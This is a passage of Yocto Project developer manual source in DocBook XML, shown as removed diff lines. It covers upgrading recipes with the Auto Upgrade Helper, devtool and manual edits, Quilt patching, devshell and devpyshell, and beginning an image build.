- <emphasis>Optionally Start a vncserver:</emphasis>
- If you are running in a server without an X11 session,
- you need to start a vncserver:
- <literallayout class='monospaced'>
- $ vncserver :1
- $ export DISPLAY=:1
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Create and Edit an AUH Configuration File:</emphasis>
- You need to have the
- <filename>upgrade-helper/upgrade-helper.conf</filename>
- configuration file in your build directory.
- You can find a sample configuration file in the
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/auto-upgrade-helper/tree/'>AUH source repository</ulink>.
- </para>
-
- <para>Read through the sample file and make
- configurations as needed.
- For example, if you enabled build history in your
- <filename>local.conf</filename> as described earlier,
- you must enable it in
- <filename>upgrade-helper.conf</filename>.</para>
-
- <para>Also, if you are using the default
- <filename>maintainers.inc</filename> file supplied
- with Poky and located in
- <filename>meta-yocto</filename> and you do not set a
- "maintainers_whitelist" or "global_maintainer_override"
- in the <filename>upgrade-helper.conf</filename>
- configuration, and you specify "-e all" on the
- AUH command-line, the utility automatically sends out
- emails to all the default maintainers.
- Please avoid this.
- </para></listitem>
- </orderedlist>
- </para>
-
- <para>
- This next set of examples describes how to use the AUH:
- <itemizedlist>
- <listitem><para>
- <emphasis>Upgrading a Specific Recipe:</emphasis>
- To upgrade a specific recipe, use the following
- form:
- <literallayout class='monospaced'>
- $ upgrade-helper.py <replaceable>recipe_name</replaceable>
- </literallayout>
- For example, this command upgrades the
- <filename>xmodmap</filename> recipe:
- <literallayout class='monospaced'>
- $ upgrade-helper.py xmodmap
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Upgrading a Specific Recipe to a Particular Version:</emphasis>
- To upgrade a specific recipe to a particular version,
- use the following form:
- <literallayout class='monospaced'>
- $ upgrade-helper.py <replaceable>recipe_name</replaceable> -t <replaceable>version</replaceable>
- </literallayout>
- For example, this command upgrades the
- <filename>xmodmap</filename> recipe to version
- 1.2.3:
- <literallayout class='monospaced'>
- $ upgrade-helper.py xmodmap -t 1.2.3
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Upgrading all Recipes to the Latest Versions and Suppressing Email Notifications:</emphasis>
- To upgrade all recipes to their most recent versions
- and suppress the email notifications, use the following
- command:
- <literallayout class='monospaced'>
- $ upgrade-helper.py all
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Upgrading all Recipes to the Latest Versions and Send Email Notifications:</emphasis>
- To upgrade all recipes to their most recent versions
- and send email messages to maintainers for each
- attempted recipe as well as a status email, use the
- following command:
- <literallayout class='monospaced'>
- $ upgrade-helper.py -e all
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Once you have run the AUH utility, you can find the results
- in the AUH build directory:
- <literallayout class='monospaced'>
- ${BUILDDIR}/upgrade-helper/<replaceable>timestamp</replaceable>
- </literallayout>
- The AUH utility also creates recipe update commits from
- successful upgrade attempts in the layer tree.
- </para>
-
- <para>
- You can easily set up to run the AUH utility on a regular
- basis by using a cron job.
- See the
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/auto-upgrade-helper/tree/weeklyjob.sh'><filename>weeklyjob.sh</filename></ulink>
- file distributed with the utility for an example.
- </para>
- </section>
-
- <section id='gs-using-devtool-upgrade'>
- <title>Using <filename>devtool upgrade</filename></title>
-
- <para>
- As mentioned earlier, an alternative method for upgrading
- recipes to newer versions is to use
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-devtool-reference'><filename>devtool upgrade</filename></ulink>.
- You can read about <filename>devtool upgrade</filename> in
- general in the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-devtool-use-devtool-upgrade-to-create-a-version-of-the-recipe-that-supports-a-newer-version-of-the-software'>Use <filename>devtool upgrade</filename> to Create a Version of the Recipe that Supports a Newer Version of the Software</ulink>"
- section in the Yocto Project Application Development and the
- Extensible Software Development Kit (eSDK) Manual.
- </para>
-
- <para>
- To see all the command-line options available with
- <filename>devtool upgrade</filename>, use the following help
- command:
- <literallayout class='monospaced'>
- $ devtool upgrade -h
- </literallayout>
- </para>
-
- <para>
- If you want to find out what version a recipe is currently at
- upstream without any attempt to upgrade your local version of
- the recipe, you can use the following command:
- <literallayout class='monospaced'>
- $ devtool latest-version <replaceable>recipe_name</replaceable>
- </literallayout>
- </para>
-
- <para>
- As mentioned in the previous section describing AUH,
- <filename>devtool upgrade</filename> works in a
- less-automated manner than AUH.
- Specifically, <filename>devtool upgrade</filename> only
- works on a single recipe that you name on the command line,
- cannot perform build and integration testing using images,
- and does not automatically generate commits for changes in
- the source tree.
- Despite all these "limitations",
- <filename>devtool upgrade</filename> updates the recipe file
- to the new upstream version and attempts to rebase custom
- patches contained by the recipe as needed.
- <note>
- AUH uses much of <filename>devtool upgrade</filename>
- behind the scenes making AUH somewhat of a "wrapper"
- application for <filename>devtool upgrade</filename>.
- </note>
- </para>
-
- <para>
- A typical scenario involves having used Git to clone an
- upstream repository that you use during build operations.
- Because you are (or have) built the recipe in the past, the
- layer is likely added to your configuration already.
- If for some reason, the layer is not added, you could add
- it easily using the
- <ulink url='&YOCTO_DOCS_BSP_URL;#creating-a-new-bsp-layer-using-the-bitbake-layers-script'><filename>bitbake-layers</filename></ulink>
- script.
- For example, suppose you use the <filename>nano.bb</filename>
- recipe from the <filename>meta-oe</filename> layer in the
- <filename>meta-openembedded</filename> repository.
- For this example, assume that the layer has been cloned into
- following area:
- <literallayout class='monospaced'>
- /home/scottrif/meta-openembedded
- </literallayout>
- The following command from your
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- adds the layer to your build configuration (i.e.
- <filename>${BUILDDIR}/conf/bblayers.conf</filename>):
- <literallayout class='monospaced'>
- $ bitbake-layers add-layer /home/scottrif/meta-openembedded/meta-oe
- NOTE: Starting bitbake server...
- Parsing recipes: 100% |##########################################| Time: 0:00:55
- Parsing of 1431 .bb files complete (0 cached, 1431 parsed). 2040 targets, 56 skipped, 0 masked, 0 errors.
- Removing 12 recipes from the x86_64 sysroot: 100% |##############| Time: 0:00:00
- Removing 1 recipes from the x86_64_i586 sysroot: 100% |##########| Time: 0:00:00
- Removing 5 recipes from the i586 sysroot: 100% |#################| Time: 0:00:00
- Removing 5 recipes from the qemux86 sysroot: 100% |##############| Time: 0:00:00
- </literallayout>
- For this example, assume that the <filename>nano.bb</filename>
- recipe that is upstream has a 2.9.3 version number.
- However, the version in the local repository is 2.7.4.
- The following command from your build directory automatically
- upgrades the recipe for you:
- <note>
- Using the <filename>-V</filename> option is not necessary.
- Omitting the version number causes
- <filename>devtool upgrade</filename> to upgrade the recipe
- to the most recent version.
- </note>
- <literallayout class='monospaced'>
- $ devtool upgrade nano -V 2.9.3
- NOTE: Starting bitbake server...
- NOTE: Creating workspace layer in /home/scottrif/poky/build/workspace
- Parsing recipes: 100% |##########################################| Time: 0:00:46
- Parsing of 1431 .bb files complete (0 cached, 1431 parsed). 2040 targets, 56 skipped, 0 masked, 0 errors.
- NOTE: Extracting current version source...
- NOTE: Resolving any missing task queue dependencies
- .
- .
- .
- NOTE: Executing SetScene Tasks
- NOTE: Executing RunQueue Tasks
- NOTE: Tasks Summary: Attempted 74 tasks of which 72 didn't need to be rerun and all succeeded.
- Adding changed files: 100% |#####################################| Time: 0:00:00
- NOTE: Upgraded source extracted to /home/scottrif/poky/build/workspace/sources/nano
- NOTE: New recipe is /home/scottrif/poky/build/workspace/recipes/nano/nano_2.9.3.bb
- </literallayout>
- Continuing with this example, you can use
- <filename>devtool build</filename> to build the newly upgraded
- recipe:
- <literallayout class='monospaced'>
- $ devtool build nano
- NOTE: Starting bitbake server...
- Loading cache: 100% |################################################################################################| Time: 0:00:01
- Loaded 2040 entries from dependency cache.
- Parsing recipes: 100% |##############################################################################################| Time: 0:00:00
- Parsing of 1432 .bb files complete (1431 cached, 1 parsed). 2041 targets, 56 skipped, 0 masked, 0 errors.
- NOTE: Resolving any missing task queue dependencies
- .
- .
- .
- NOTE: Executing SetScene Tasks
- NOTE: Executing RunQueue Tasks
- NOTE: nano: compiling from external source tree /home/scottrif/poky/build/workspace/sources/nano
- NOTE: Tasks Summary: Attempted 520 tasks of which 304 didn't need to be rerun and all succeeded.
- </literallayout>
- Within the <filename>devtool upgrade</filename> workflow,
- opportunity exists to deploy and test your rebuilt software.
- For this example, however, running
- <filename>devtool finish</filename> cleans up the workspace
- once the source in your workspace is clean.
- This usually means using Git to stage and submit commits
- for the changes generated by the upgrade process.
- </para>
-
- <para>
- Once the tree is clean, you can clean things up in this
- example with the following command from the
- <filename>${BUILDDIR}/workspace/sources/nano</filename>
- directory:
- <literallayout class='monospaced'>
- $ devtool finish nano meta-oe
- NOTE: Starting bitbake server...
- Loading cache: 100% |################################################################################################| Time: 0:00:00
- Loaded 2040 entries from dependency cache.
- Parsing recipes: 100% |##############################################################################################| Time: 0:00:01
- Parsing of 1432 .bb files complete (1431 cached, 1 parsed). 2041 targets, 56 skipped, 0 masked, 0 errors.
- NOTE: Adding new patch 0001-nano.bb-Stuff-I-changed-when-upgrading-nano.bb.patch
- NOTE: Updating recipe nano_2.9.3.bb
- NOTE: Removing file /home/scottrif/meta-openembedded/meta-oe/recipes-support/nano/nano_2.7.4.bb
- NOTE: Moving recipe file to /home/scottrif/meta-openembedded/meta-oe/recipes-support/nano
- NOTE: Leaving source tree /home/scottrif/poky/build/workspace/sources/nano as-is; if you no longer need it then please delete it manually
- </literallayout>
- Using the <filename>devtool finish</filename> command cleans
- up the workspace and creates a patch file based on your
- commits.
- The tool puts all patch files back into the source directory
- in a sub-directory named <filename>nano</filename> in this
- case.
- </para>
- </section>
-
- <section id='dev-manually-upgrading-a-recipe'>
- <title>Manually Upgrading a Recipe</title>
-
- <para>
- If for some reason you choose not to upgrade recipes using the
- <link linkend='gs-using-the-auto-upgrade-helper'>Auto Upgrade Helper (AUH)</link>
- or by using
- <link linkend='gs-using-devtool-upgrade'><filename>devtool upgrade</filename></link>,
- you can manually edit the recipe files to upgrade the versions.
- <note><title>Caution</title>
- Manually updating multiple recipes scales poorly and
- involves many steps.
- The recommendation to upgrade recipe versions is through
- AUH or <filename>devtool upgrade</filename>, both of which
- automate some steps and provide guidance for others needed
- for the manual process.
- </note>
- </para>
-
- <para>
- To manually upgrade recipe versions, follow these general steps:
- <orderedlist>
- <listitem><para>
- <emphasis>Change the Version:</emphasis>
- Rename the recipe such that the version (i.e. the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>
- part of the recipe name) changes appropriately.
- If the version is not part of the recipe name, change
- the value as it is set for <filename>PV</filename>
- within the recipe itself.
- </para></listitem>
- <listitem><para>
- <emphasis>Update <filename>SRCREV</filename> if Needed:</emphasis>
- If the source code your recipe builds is fetched from
- Git or some other version control system, update
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>
- to point to the commit hash that matches the new
- version.
- </para></listitem>
- <listitem><para>
- <emphasis>Build the Software:</emphasis>
- Try to build the recipe using BitBake.
- Typical build failures include the following:
- <itemizedlist>
- <listitem><para>
- License statements were updated for the new
- version.
- For this case, you need to review any changes
- to the license and update the values of
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE'><filename>LICENSE</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></ulink>
- as needed.
- <note>
- License changes are often inconsequential.
- For example, the license text's copyright
- year might have changed.
- </note>
- </para></listitem>
- <listitem><para>
- Custom patches carried by the older version of
- the recipe might fail to apply to the new
- version.
- For these cases, you need to review the
- failures.
- Patches might not be necessary for the new
- version of the software if the upgraded version
- has fixed those issues.
- If a patch is necessary and failing, you need
- to rebase it into the new version.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Optionally Attempt to Build for Several Architectures:</emphasis>
- Once you successfully build the new software for a
- given architecture, you could test the build for
- other architectures by changing the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
- variable and rebuilding the software.
- This optional step is especially important if the
- recipe is to be released publicly.
- </para></listitem>
- <listitem><para>
- <emphasis>Check the Upstream Change Log or Release Notes:</emphasis>
- Checking both these reveals if new features exist that
- could break backwards-compatibility.
- If so, you need to take steps to mitigate or eliminate
- that situation.
- </para></listitem>
- <listitem><para>
- <emphasis>Optionally Create a Bootable Image and Test:</emphasis>
- If you want, you can test the new software by booting
- it onto actual hardware.
- </para></listitem>
- <listitem><para>
- <emphasis>Create a Commit with the Change in the Layer Repository:</emphasis>
- After all builds work and any testing is successful,
- you can create commits for any changes in the layer
- holding your upgraded recipe.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
- </section>
-
- <section id='finding-the-temporary-source-code'>
- <title>Finding Temporary Source Code</title>
-
- <para>
- You might find it helpful during development to modify the
- temporary source code used by recipes to build packages.
- For example, suppose you are developing a patch and you need to
- experiment a bit to figure out your solution.
- After you have initially built the package, you can iteratively
- tweak the source code, which is located in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
- and then you can force a re-compile and quickly test your altered
- code.
- Once you settle on a solution, you can then preserve your changes
- in the form of patches.
- </para>
-
- <para>
- During a build, the unpacked temporary source code used by recipes
- to build packages is available in the Build Directory as
- defined by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>
- variable.
- Below is the default value for the <filename>S</filename> variable
- as defined in the
- <filename>meta/conf/bitbake.conf</filename> configuration file
- in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>:
- <literallayout class='monospaced'>
- S = "${WORKDIR}/${BP}"
- </literallayout>
- You should be aware that many recipes override the
- <filename>S</filename> variable.
- For example, recipes that fetch their source from Git usually set
- <filename>S</filename> to <filename>${WORKDIR}/git</filename>.
- <note>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BP'><filename>BP</filename></ulink>
- represents the base recipe name, which consists of the name
- and version:
- <literallayout class='monospaced'>
- BP = "${BPN}-${PV}"
- </literallayout>
- </note>
- </para>
-
- <para>
- The path to the work directory for the recipe
- (<ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>)
- is defined as follows:
- <literallayout class='monospaced'>
- ${TMPDIR}/work/${MULTIMACH_TARGET_SYS}/${PN}/${EXTENDPE}${PV}-${PR}
- </literallayout>
- The actual directory depends on several things:
- <itemizedlist>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>:
- The top-level build output directory.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MULTIMACH_TARGET_SYS'><filename>MULTIMACH_TARGET_SYS</filename></ulink>:
- The target system identifier.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink>:
- The recipe name.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTENDPE'><filename>EXTENDPE</filename></ulink>:
- The epoch - (if
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PE'><filename>PE</filename></ulink>
- is not specified, which is usually the case for most
- recipes, then <filename>EXTENDPE</filename> is blank).
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>:
- The recipe version.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>:
- The recipe revision.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- As an example, assume a Source Directory top-level folder
- named <filename>poky</filename>, a default Build Directory at
- <filename>poky/build</filename>, and a
- <filename>qemux86-poky-linux</filename> machine target
- system.
- Furthermore, suppose your recipe is named
- <filename>foo_1.3.0.bb</filename>.
- In this case, the work directory the build system uses to
- build the package would be as follows:
- <literallayout class='monospaced'>
- poky/build/tmp/work/qemux86-poky-linux/foo/1.3.0-r0
- </literallayout>
- </para>
- </section>
-
- <section id="using-a-quilt-workflow">
- <title>Using Quilt in Your Workflow</title>
-
- <para>
- <ulink url='http://savannah.nongnu.org/projects/quilt'>Quilt</ulink>
- is a powerful tool that allows you to capture source code changes
- without having a clean source tree.
- This section outlines the typical workflow you can use to modify
- source code, test changes, and then preserve the changes in the
- form of a patch all using Quilt.
- <note><title>Tip</title>
- With regard to preserving changes to source files, if you
- clean a recipe or have <filename>rm_work</filename> enabled,
- the
- <ulink url='&YOCTO_DOCS_SDK_URL;#using-devtool-in-your-sdk-workflow'><filename>devtool</filename> workflow</ulink>
- as described in the Yocto Project Application Development
- and the Extensible Software Development Kit (eSDK) manual
- is a safer development flow than the flow that uses Quilt.
- </note>
- </para>
-
- <para>
- Follow these general steps:
- <orderedlist>
- <listitem><para>
- <emphasis>Find the Source Code:</emphasis>
- Temporary source code used by the OpenEmbedded build system
- is kept in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- See the
- "<link linkend='finding-the-temporary-source-code'>Finding Temporary Source Code</link>"
- section to learn how to locate the directory that has the
- temporary source code for a particular package.
- </para></listitem>
- <listitem><para>
- <emphasis>Change Your Working Directory:</emphasis>
- You need to be in the directory that has the temporary
- source code.
- That directory is defined by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>
- variable.</para></listitem>
- <listitem><para>
- <emphasis>Create a New Patch:</emphasis>
- Before modifying source code, you need to create a new
- patch.
- To create a new patch file, use
- <filename>quilt new</filename> as below:
- <literallayout class='monospaced'>
- $ quilt new my_changes.patch
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Notify Quilt and Add Files:</emphasis>
- After creating the patch, you need to notify Quilt about
- the files you plan to edit.
- You notify Quilt by adding the files to the patch you
- just created:
- <literallayout class='monospaced'>
- $ quilt add file1.c file2.c file3.c
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Edit the Files:</emphasis>
- Make your changes in the source code to the files you added
- to the patch.
- </para></listitem>
- <listitem><para>
- <emphasis>Test Your Changes:</emphasis>
- Once you have modified the source code, the easiest way to
- test your changes is by calling the
- <filename>do_compile</filename> task as shown in the
- following example:
- <literallayout class='monospaced'>
- $ bitbake -c compile -f <replaceable>package</replaceable>
- </literallayout>
- The <filename>-f</filename> or <filename>--force</filename>
- option forces the specified task to execute.
- If you find problems with your code, you can just keep
- editing and re-testing iteratively until things work
- as expected.
- <note>
- All the modifications you make to the temporary
- source code disappear once you run the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-clean'><filename>do_clean</filename></ulink>
- or
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-cleanall'><filename>do_cleanall</filename></ulink>
- tasks using BitBake (i.e.
- <filename>bitbake -c clean <replaceable>package</replaceable></filename>
- and
- <filename>bitbake -c cleanall <replaceable>package</replaceable></filename>).
- Modifications will also disappear if you use the
- <filename>rm_work</filename> feature as described
- in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-saving-memory-during-a-build'>Conserving Disk Space During Builds</ulink>"
- section.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Generate the Patch:</emphasis>
- Once your changes work as expected, you need to use Quilt
- to generate the final patch that contains all your
- modifications.
- <literallayout class='monospaced'>
- $ quilt refresh
- </literallayout>
- At this point, the <filename>my_changes.patch</filename>
- file has all your edits made to the
- <filename>file1.c</filename>, <filename>file2.c</filename>,
- and <filename>file3.c</filename> files.</para>
-
- <para>You can find the resulting patch file in the
- <filename>patches/</filename> subdirectory of the source
- (<filename>S</filename>) directory.
- </para></listitem>
- <listitem><para>
- <emphasis>Copy the Patch File:</emphasis>
- For simplicity, copy the patch file into a directory
- named <filename>files</filename>, which you can create
- in the same directory that holds the recipe
- (<filename>.bb</filename>) file or the append
- (<filename>.bbappend</filename>) file.
- Placing the patch here guarantees that the OpenEmbedded
- build system will find the patch.
- Next, add the patch into the
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'>SRC_URI</ulink></filename>
- of the recipe.
- Here is an example:
- <literallayout class='monospaced'>
- SRC_URI += "file://my_changes.patch"
- </literallayout>
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id="platdev-appdev-devshell">
- <title>Using a Development Shell</title>
-
- <para>
- When debugging certain commands or even when just editing packages,
- <filename>devshell</filename> can be a useful tool.
- When you invoke <filename>devshell</filename>, all tasks up to and
- including
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-patch'><filename>do_patch</filename></ulink>
- are run for the specified target.
- Then, a new terminal is opened and you are placed in
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink><filename>}</filename>,
- the source directory.
- In the new terminal, all the OpenEmbedded build-related environment variables are
- still defined so you can use commands such as <filename>configure</filename> and
- <filename>make</filename>.
- The commands execute just as if the OpenEmbedded build system were executing them.
- Consequently, working this way can be helpful when debugging a build or preparing
- software to be used with the OpenEmbedded build system.
- </para>
-
- <para>
- Following is an example that uses <filename>devshell</filename> on a target named
- <filename>matchbox-desktop</filename>:
- <literallayout class='monospaced'>
- $ bitbake matchbox-desktop -c devshell
- </literallayout>
- </para>
-
- <para>
- This command spawns a terminal with a shell prompt within the OpenEmbedded build environment.
- The <ulink url='&YOCTO_DOCS_REF_URL;#var-OE_TERMINAL'><filename>OE_TERMINAL</filename></ulink>
- variable controls what type of shell is opened.
- </para>
-
- <para>
- For spawned terminals, the following occurs:
- <itemizedlist>
- <listitem><para>The <filename>PATH</filename> variable includes the
- cross-toolchain.</para></listitem>
- <listitem><para>The <filename>pkgconfig</filename> variables find the correct
- <filename>.pc</filename> files.</para></listitem>
- <listitem><para>The <filename>configure</filename> command finds the
- Yocto Project site files as well as any other necessary files.</para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Within this environment, you can run configure or compile
- commands as if they were being run by
- the OpenEmbedded build system itself.
- As noted earlier, the working directory also automatically changes to the
- Source Directory (<ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>).
- </para>
-
- <para>
- To manually run a specific task using <filename>devshell</filename>,
- run the corresponding <filename>run.*</filename> script in
- the
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}/temp</filename>
- directory (e.g.,
- <filename>run.do_configure.</filename><replaceable>pid</replaceable>).
- If a task's script does not exist, which would be the case if the task was
- skipped by way of the sstate cache, you can create the task by first running
- it outside of the <filename>devshell</filename>:
- <literallayout class='monospaced'>
- $ bitbake -c <replaceable>task</replaceable>
- </literallayout>
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>Execution of a task's <filename>run.*</filename>
- script and BitBake's execution of a task are identical.
- In other words, running the script re-runs the task
- just as it would be run using the
- <filename>bitbake -c</filename> command.
- </para></listitem>
- <listitem><para>Any <filename>run.*</filename> file that does not
- have a <filename>.pid</filename> extension is a
- symbolic link (symlink) to the most recent version of that
- file.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- Remember, that the <filename>devshell</filename> is a mechanism that allows
- you to get into the BitBake task execution environment.
- And as such, all commands must be called just as BitBake would call them.
- That means you need to provide the appropriate options for
- cross-compilation and so forth as applicable.
- </para>
-
- <para>
- When you are finished using <filename>devshell</filename>, exit the shell
- or close the terminal window.
- </para>
-
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- It is worth remembering that when using <filename>devshell</filename>
- you need to use the full compiler name such as <filename>arm-poky-linux-gnueabi-gcc</filename>
- instead of just using <filename>gcc</filename>.
- The same applies to other applications such as <filename>binutils</filename>,
- <filename>libtool</filename> and so forth.
- BitBake sets up environment variables such as <filename>CC</filename>
- to assist applications, such as <filename>make</filename> to find the correct tools.
- </para></listitem>
- <listitem><para>
- It is also worth noting that <filename>devshell</filename> still works over
- X11 forwarding and similar situations.
- </para></listitem>
- </itemizedlist>
- </note>
- </section>
-
- <section id="platdev-appdev-devpyshell">
- <title>Using a Development Python Shell</title>
-
- <para>
- Similar to working within a development shell as described in
- the previous section, you can also spawn and work within an
- interactive Python development shell.
- When debugging certain commands or even when just editing packages,
- <filename>devpyshell</filename> can be a useful tool.
- When you invoke <filename>devpyshell</filename>, all tasks up to and
- including
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-patch'><filename>do_patch</filename></ulink>
- are run for the specified target.
- Then a new terminal is opened.
- Additionally, key Python objects and code are available in the same
- way they are to BitBake tasks, in particular, the data store 'd'.
- So, commands such as the following are useful when exploring the data
- store and running functions:
- <literallayout class='monospaced'>
- pydevshell> d.getVar("STAGING_DIR")
- '/media/build1/poky/build/tmp/sysroots'
- pydevshell> d.getVar("STAGING_DIR")
- '${TMPDIR}/sysroots'
- pydevshell> d.setVar("FOO", "bar")
- pydevshell> d.getVar("FOO")
- 'bar'
- pydevshell> d.delVar("FOO")
- pydevshell> d.getVar("FOO")
- pydevshell> bb.build.exec_func("do_unpack", d)
- pydevshell>
- </literallayout>
- The commands execute just as if the OpenEmbedded build system were executing them.
- Consequently, working this way can be helpful when debugging a build or preparing
- software to be used with the OpenEmbedded build system.
- </para>
-
- <para>
- Following is an example that uses <filename>devpyshell</filename> on a target named
- <filename>matchbox-desktop</filename>:
- <literallayout class='monospaced'>
- $ bitbake matchbox-desktop -c devpyshell
- </literallayout>
- </para>
-
- <para>
- This command spawns a terminal and places you in an interactive
- Python interpreter within the OpenEmbedded build environment.
- The <ulink url='&YOCTO_DOCS_REF_URL;#var-OE_TERMINAL'><filename>OE_TERMINAL</filename></ulink>
- variable controls what type of shell is opened.
- </para>
-
- <para>
- When you are finished using <filename>devpyshell</filename>, you
- can exit the shell either by using Ctrl+d or closing the terminal
- window.
- </para>
- </section>
-
- <section id='dev-building'>
- <title>Building</title>
-
- <para>
- This section describes various build procedures.
- For example, the steps needed for a simple build, a target that
- uses multiple configurations, building an image for more than
- one machine, and so forth.
- </para>
-
- <section id='dev-building-a-simple-image'>
- <title>Building a Simple Image</title>
-
- <para>
- In the development environment, you need to build an image
- whenever you change hardware support, add or change system
- libraries, or add or change services that have dependencies.
- Several methods exist that allow you to build an image within
- the Yocto Project.
- This section presents the basic steps you need to build a
- simple image using BitBake from a build host running Linux.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- For information on how to build an image using
- <ulink url='&YOCTO_DOCS_REF_URL;#toaster-term'>Toaster</ulink>,
- see the
- <ulink url='&YOCTO_DOCS_TOAST_URL;'>Toaster User Manual</ulink>.
- </para></listitem>
- <listitem><para>
- For information on how to use
- <filename>devtool</filename> to build images, see
- the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#using-devtool-in-your-sdk-workflow'>Using <filename>devtool</filename> in Your SDK Workflow</ulink>"
- section in the Yocto Project Application
- Development and the Extensible Software Development
- Kit (eSDK) manual.
- </para></listitem>
- <listitem><para>
- For a quick example on how to build an image using
- the OpenEmbedded build system, see the
- <ulink url='&YOCTO_DOCS_BRIEF_URL;'>Yocto Project Quick Build</ulink>
- document.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- The build process creates an entire Linux distribution from
- source and places it in your
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- under <filename>tmp/deploy/images</filename>.
- For detailed information on the build process using BitBake,
- see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#images-dev-environment'>Images</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
-
- <para>
- The following figure and list overviews the build process:
- <imagedata fileref="figures/bitbake-build-flow.png" width="7in" depth="4in" align="center" scalefit="1" />
- <orderedlist>
- <listitem><para>
- <emphasis>Set up Your Host Development System to Support
- Development Using the Yocto Project</emphasis>:
- See the
- "<link linkend='dev-manual-start'>Setting Up to Use the Yocto Project</link>"
- section for options on how to get a build host ready to
- use the Yocto Project.
- </para></listitem>
- <listitem><para>
- <emphasis>Initialize the Build Environment:</emphasis>
- Initialize the build environment by sourcing the build
- environment script (i.e.
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>):
- <literallayout class='monospaced'>
- $ source &OE_INIT_FILE; [<replaceable>build_dir</replaceable>]
- </literallayout></para>
-
- <para>When you use the initialization script, the
- OpenEmbedded build system uses
- <filename>build</filename> as the default Build
- Directory in your current work directory.
- You can use a <replaceable>build_dir</replaceable>
- argument with the script to specify a different build
- directory.
- <note><title>Tip</title>
- A common practice is to use a different Build
- Directory for different targets.
- For example, <filename>~/build/x86</filename> for a
- <filename>qemux86</filename> target, and
- <filename>~/build/arm</filename> for a
- <filename>qemuarm</filename> target.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Make Sure Your <filename>local.conf</filename>
- File is Correct:</emphasis>
- Ensure the <filename>conf/local.conf</filename>
- configuration file, which is found in the Build
- Directory, is set up how you want it.
- This file defines many aspects of the build environment
- including the target machine architecture through the
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'>MACHINE</ulink></filename> variable,
- the packaging format used during the build
- (<ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></ulink>),
- and a centralized tarball download directory through the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink> variable.
- </para></listitem>
- <listitem><para>
- <emphasis>Build the Image:</emphasis>
- Build the image using the <filename>bitbake</filename>
- command:
- <literallayout class='monospaced'>
- $ bitbake <replaceable>target</replaceable>
- </literallayout>
- <note>
